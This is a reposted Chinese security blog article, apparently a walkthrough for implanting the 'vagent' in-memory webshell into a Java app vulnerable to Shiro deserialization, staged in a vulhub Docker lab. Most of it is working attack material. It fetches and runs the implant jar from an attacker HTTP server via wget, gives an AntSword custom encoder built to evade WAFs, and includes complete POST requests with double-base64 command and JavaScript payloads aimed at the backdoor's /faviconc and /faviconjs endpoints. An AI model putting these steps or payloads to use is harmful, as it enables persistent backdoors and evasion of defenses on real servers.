vagent内存马注入工具(具体实现)

admin
admin
admin
102367
文章
87
评论
2023年12月10日02:42:14评论77 views字数 4889阅读16分17秒阅读模式

一、模拟环境

首先模拟了一个 通过shiro反序列化漏洞,该环境以部署jar包方式,并且无法通过shiro工具打入内存马,需要手动注入内存马

vulhub上的CVE-2010-3863环境

cd  /root/vulhub-master/shiro/CVE-2010-3863docker-composer  up -d

vagent内存马注入工具(具体实现)

进入到容器中

docker  exec  -it   cve-2010-3863_web_1   /bin/bash

vagent内存马注入工具(具体实现)

需要下载工具 vagent

https://github.com/veo/vagent可以直接打入内存马
起一个python3服务python3  -m http.server   81

wget http://xx.xx.xx.xx:81/vagent.jar  //下载工具

java -jar  vagent.jar  //执行该工具 返回 id >>> 1 执行成功

vagent内存马注入工具(具体实现)

二、工具分析

CMD方式

以CMD方式运行时,需要POST faviconc方式运行,并且base64加密2次才可以,以参数c的方式进行运行

vagent内存马注入工具(具体实现)

JS代码执行马

需要POST faviconjs方式运行,以参数a的方式进行运行

vagent内存马注入工具(具体实现)
蚁剑可以连接需要新增自定义加密

vagent内存马注入工具(具体实现)

这里我们需要自定义一下加密方式
参考链接 

https://darkless.cn/2020/05/19/antsword-bypass-waf/

vagent内存马注入工具(具体实现)

/** * php::base64编码器 * Create at: 2023/12/08 15:58:49 */

'use strict';

/** @param  {String} pwd   连接密码* @param  {Array}  data  编码器处理前的 payload 数组* @return {Array}  data  编码器处理后的 payload 数组*/module.exports = (pwd, data, ext={}) => {  // ##########    请在下方编写你自己的代码   ###################  // 以下代码为 PHP Base64 样例

  // 生成一个随机变量名

  // 原有的 payload 在 data['_']中  // 取出来之后,转为 base64 编码并放入 randomID key 下  data[pwd]= Buffer.from(Buffer.from(data['_']).toString('base64')).toString('base64');





  // ##########    请在上方编写你自己的代码   ###################

  // 删除 _ 原有的payload  delete data['_'];  // 返回编码器处理后的 payload 数组  return data;}

vagent内存马注入工具(具体实现)

可以连接成功!

三、具体利用方式

CMD方式

POST /faviconc HTTP/1.1Host: xxxxxxx:8080User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: PUBLICCMS_ANALYTICS_ID=a78832e8-21a6-47a6-bdf1-81f65d60ec34; PUBLICCMS_ADMIN=1_08903062-c592-48b4-a167-38d5b6b967d7; sessionID=50fd23a2deeb818ba5ecbbd09c99c0ee; PHPSESSID=tu8p4vkjvr7clpmeceou610021; JSESSIONID=D18E0C1AF4AB8438F75E42C80ECEDB1FUpgrade-Insecure-Requests: 1X-Forwarded-For: 127.0.0.1X-Originating-IP: 127.0.0.1X-Remote-IP: 127.0.0.1X-Remote-Addr: 127.0.0.1Content-Length: 18

c=ZDJodllXMXA=

其中ZDJodllXMXA=为两次base64解密的whomai值

vagent内存马注入工具(具体实现)

JS代码执行马

POST /faviconjs HTTP/1.1Host: xx.xx.xx.xx:8080Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36Content-Type: application/x-www-form-urlencodedContent-Length: 2734Connection: close

a=ZEhKNUlIdHNiMkZrS0NKdVlYTm9iM0p1T20xdmVtbHNiR0ZmWTI5dGNHRjBMbXB6SWlrN2ZTQmpZWFJqYUNBb1pTa2dlMzFwYlhCdmNuUlFZV05yWVdkbEtGQmhZMnRoWjJWekxtcGhkbUV1ZFhScGJDazdhVzF3YjNKMFVHRmphMkZuWlNoUVlXTnJZV2RsY3k1cVlYWmhMbXhoYm1jcE8ybHRjRzl5ZEZCaFkydGhaMlVvVUdGamEyRm5aWE11YW1GMllTNXBieWs3ZG1GeUlHOTFkSEIxZENBOUlHNWxkeUJUZEhKcGJtZENkV1ptWlhJb0lpSXBPM1poY2lCamN5QTlJQ0pWVkVZdE9DSTdkbUZ5SUhSaFoxOXpJRDBnSW1Saklpc2lPV1ZsSWp0MllYSWdkR0ZuWDJVZ1BTQWlOekVpS3lKaVptTWlPM1J5ZVNCN1puVnVZM1JwYjI0Z1pHVmpiMlJsS0hOMGNpa2dlM04wY2lBOUlITjBjaTV6ZFdKemRISW9NaWs3ZG1GeUlHSjBQVUpoYzJVMk5FUmxZMjlrWlZSdlFubDBaU2h6ZEhJcE8zSmxkSFZ5YmlCdVpYY2dhbUYyWVM1c1lXNW5MbE4wY21sdVp5aGlkQ3hqY3lrN2ZXWjFibU4wYVc5dUlFSmhjMlUyTkVSbFkyOWtaVlJ2UW5sMFpTaHpkSElwSUh0cGJYQnZjblJRWVdOcllXZGxLRkJoWTJ0aFoyVnpMbk4xYmk1dGFYTmpLVHRwYlhCdmNuUlFZV05yWVdkbEtGQmhZMnRoWjJWekxtcGhkbUV1ZFhScGJDazdkbUZ5SUdKME8zUnllU0I3WW5RZ1BTQnVaWGNnUWtGVFJUWTBSR1ZqYjJSbGNpZ3BMbVJsWTI5a1pVSjFabVpsY2loemRISXBPMzBnWTJGMFkyZ2dLR1VwSUh0aWRDQTlJRUpoYzJVMk5DNW5aWFJFWldOdlpHVnlLQ2t1WkdWamIyUmxLSE4wY2lrN2ZYSmxkSFZ5YmlCaWREdDlablZ1WTNScGIyNGdZWE5sYm1Nb2MzUnlLWHRwYlhCdmNuUlFZV05yWVdkbEtGQmhZMnRoWjJWekxuTjFiaTV0YVhOaktUdHBiWEJ2Y25SUVlXTnJZV2RsS0ZCaFkydGhaMlZ6TG1waGRtRXVkWFJwYkNrN2RtRnlJSEpsZENBOUlDSWlPM1J5ZVNCN2NtVjBJRDBnYm1WM0lFSmhjMlUyTkNncExtZGxkRVZ1WTI5a1pYSW9LUzVsYm1OdlpHVlViMU4wY21sdVp5aHpkSEl1WjJWMFFubDBaWE1vS1NrN2ZTQmpZWFJqYUNBb1pTa2dlM0psZENBOUlHNWxkeUJDUVZORk5qUkZibU52WkdWeUtDa3VaVzVqYjJSbEtITjBjaTVuWlhSQ2VYUmxjeWdwS1R0OWNtVjBJRDBnY21WMExuSmxjR3hoWTJWQmJHd29JbHh5ZkZ4dUlpd2dJaUlwTzNKbGRIVnliaUJ5WlhRN2ZXWjFibU4wYVc5dUlGTjVjMGx1Wm05RGIyUmxLQ2tnZTNaaGNpQmtJRDBnVTNsemRHVnRMbWRsZEZCeWIzQmxjblI1S0NKMWMyVnlMbVJwY2lJcE8zWmhjaUJ6WlhKMlpYSkpibVp2SUQwZ1UzbHpkR1Z0TG1kbGRGQnliM0JsY25SNUtDSnZjeTV1WVcxbElpazdkbUZ5SUhWelpYSWdQU0JUZVhOMFpXMHVaMlYwVUhKdmNHVnlkSGtvSW5WelpYSXVibUZ0WlNJcE8zWmhjaUJrY21sMlpYSnNhWE4wSUQwZ1YzZDNVbTl2ZEZCaGRHaERiMlJsS0dRcE8zSmxkSFZ5YmlCa0lDc2dJZ2tpSUNzZ1pISnBkbVZ5YkdsemRDQXJJQ0lKSWlBcklITmxjblpsY2tsdVptOGdLeUFpQ1NJZ0t5QjFjMlZ5TzMxbWRXNWpkR2x2YmlCWGQzZFNiMjkwVUdGMGFFTnZaR1VvWkNrZ2UzWmhjaUJ6SUQwZ0lpSTdhV1lnS0NGa0xuTjFZbk4wY21sdVp5Z3dMQ0F4S1M1bGNYVmhiSE1vSWk4aUtTa2dlM1poY2lCeWIyOTBjeUE5SUdwaGRtRXVhVzh1Um1sc1pTNXNhWE4wVW05dmRITW9LVHRtYjNJZ0tIWmhjaUJwSUQwZ01Ec2dhU0E4SUhKdmIzUnpMbXhsYm1kMGFEc2dhU3NyS1NCN2N5QXJQU0J5YjI5MGMxdHBYUzUwYjFOMGNtbHVaeWdwTG5OMVluTjBjbWx1Wnlnd0xDQXlLU0FySUNJaU8zMTlJR1ZzYzJVZ2UzTWdLejBnSWk4aU8zMXlaWFIxY200Z2N6dDliM1YwY0hWMExtRndjR1Z1WkNoVGVYTkpibVp2UTI5a1pTZ3BLVHQ5SUdOaGRHTm9JQ2hsS1NCN2IzVjBjSFYwTG1Gd2NHVnVaQ2dpUlZKU1QxSTZMeThnSWlBcklHVXVkRzlUZEhKcGJtY29LU2s3ZlhaaGNpQnlaWE4xYkhROWRHRm5YM01nS3lCaGMyVnVZeWh2ZFhSd2RYUXVkRzlUZEhKcGJtY29LU2tnS3lCMFlXZGZaVHQwY25rZ2UzSmxjM0J2Ym5ObExtZGxkRmR5YVhSbGNpZ3BMbkJ5YVc1MEtISmxjM1ZzZENrN2ZTQmpZWFJqYUNBb1pTa2dlM0psYzNWc2REdDk=

vagent内存马注入工具(具体实现)

主要是利用蚁剑来实现。

vagent内存马注入工具(具体实现)

原文始发于微信公众号(嗨嗨安全):vagent内存马注入工具(具体实现)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月10日02:42:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vagent内存马注入工具(具体实现)https://cn-sec.com/archives/2283659.html

发表评论

匿名网友 填写信息